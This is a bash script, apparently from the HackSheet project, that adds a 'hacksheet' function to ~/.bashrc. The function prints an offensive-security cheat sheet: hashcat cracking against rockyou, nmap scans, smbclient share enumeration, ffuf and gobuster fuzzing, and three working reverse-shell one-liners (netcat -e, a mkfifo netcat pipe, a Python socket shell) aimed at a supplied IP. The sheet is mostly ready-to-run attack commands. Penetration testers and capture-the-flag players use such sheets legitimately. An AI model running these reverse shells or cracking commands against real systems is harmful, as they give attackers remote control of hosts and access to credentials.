# cat script/bashrc >> ~/.bashrc

# HackSheet Help
# https://github.com/sawyerf/HackSheet
Title() {
	tput setaf 1
	tput bold
	echo '#-----------------------------------------------#'
	echo '# '$1' '
	echo '#-----------------------------------------------#'
	tput sgr0
}

hacksheet() {
	ip=$1
	if [ "$ip" == "" ]
	then
		ip='ip'
	fi
	Title '🔒 Crypto'
	echo 'hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt'
	echo 'https://hashcat.net/wiki/doku.php?id=example_hashes'
	Title '🌐 Network'
	echo 'nmap -A ip'
	echo 'nmap -p- -T4 -v ip'
	echo 'nmap -A -T4 -sC -sV ip'
	Title '📜 Reverse Shell'
	echo 'nc -lp 4444'
	echo "nc $ip 4444 -e /bin/bash"
	echo "mkfifo /tmp/f;nc $ip 4444 0</tmp/f|/bin/sh -i 2>&1|tee /tmp/f"
	echo "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
	Title '🪟 Windows'
	echo 'smbclient -U user -L //ip//'
	echo 'smbclient -U user //ip//shares'
	Title '🕸️ Web'
	echo "ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt:FUZZ -u http://url/ -H 'Host: FUZZ.host'"
	echo 'gobuster dir -u url -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 25 -x html,php'
	echo 'mysql -h localhost -u myname -p'
}
